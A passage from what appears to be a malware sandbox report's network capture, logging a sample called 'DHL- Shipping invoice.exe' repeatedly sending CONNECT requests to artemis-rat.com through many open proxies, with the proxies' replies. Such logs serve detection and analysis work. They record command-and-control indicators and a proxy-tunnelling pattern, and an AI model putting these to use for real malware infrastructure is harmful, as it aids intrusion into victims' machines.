                            Mar 12, 2024 08:37:04.786456108 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 2d d0 c4 08 27 16 c5 3a 00 3d 14 02 4a 8f 29 93 16 d5 78 a6 d1 dc a4 31 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9-':=J)x1DOWNGRD0000*H010Uartemis-rat.com0240312063905Z260312063905Z010Uartemis-rat.com0"0*H09L_ ID
                            Mar 12, 2024 08:37:05.002161026 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 96 6e b2 f8 02 19 19 53 1d 43 6a 39 24 2e 89 90 d8 48 b2 c5 c6 c9 c4 bd cf c4 86 08 47 81 74 6b 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 81 07 a7 58 5a 59 24 85 6b 8a 9b 74 97 6b b1 e2 38 24 e6 88 8d
                            Data Ascii: %! nSCj9$.HGtk(XZY$ktk8$PS(
                            Mar 12, 2024 08:37:05.201210976 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 5b b4 c4 46 bc 1c b8 a5 d1 39 95 f8 82 21 d8 98 86 11 f0 22 72 f2 50 bb 90 80 e2 55 ec b4 60 ae 24 c3 61 8f 59 cd 48 8b
                            Data Ascii: ([F9!"rPU`$aYH


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1238192.168.2.45376449.13.131.163806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.374352932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1239192.168.2.45364743.129.228.4678906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.375576973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.670909882 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1240192.168.2.453670121.66.198.7641456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.378860950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1241192.168.2.45376668.71.249.153486066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.379082918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1242192.168.2.453689103.221.220.22450696484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.384237051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1243192.168.2.45320651.75.126.150154746484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.385200024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1244192.168.2.4536758.137.92.8880806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.391474009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.734395981 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1245192.168.2.45201450.62.58.158340186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.400248051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1246192.168.2.453776157.185.157.151265896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.407566071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1247192.168.2.452031178.79.165.16454226484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.410511017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453237057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.453233957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.562783003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1248192.168.2.453715193.122.98.131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.411752939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.249742031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250406981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.855823040 CET536INHTTP/1.1 502 Bad Gateway
                            Server: nginx/1.24.0
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 559
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20
                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.24.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1249192.168.2.45340691.107.180.250806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.424230099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1250192.168.2.453680124.160.118.18380806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.427354097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.817616940 CET323INHTTP/1.1 400 Bad Request
                            Server: nginx/1.8.1
                            Date: Tue, 12 Mar 2024 19:58:11 GMT
                            Content-Type: text/html
                            Content-Length: 172
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1251192.168.2.453307213.136.79.177353586484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.432269096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453294992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.453232050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.562845945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.562633038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.562321901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.562274933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:16.564990044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:04.562730074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1252192.168.2.453747103.23.101.3041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.535048008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1253192.168.2.453735203.160.61.10441456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.535362959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1254192.168.2.453698223.112.53.210256484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.535415888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.662648916 CET34INHTTP/1.1 503 Service Unavailable


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1255192.168.2.453315208.87.130.154806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.536253929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.562588930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.563397884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.563025951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.562406063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.562306881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.562405109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:16.564939022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1256192.168.2.453722208.109.14.49420726484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.536675930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1257192.168.2.453209173.212.237.43472756484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.536859035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.562587023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.563395977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.563060999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.562406063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1258192.168.2.453830104.25.230.252806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.537041903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.624352932 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1259192.168.2.453834104.16.221.57806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.539899111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.627233028 CET316INHTTP/1.1 400 Bad Request
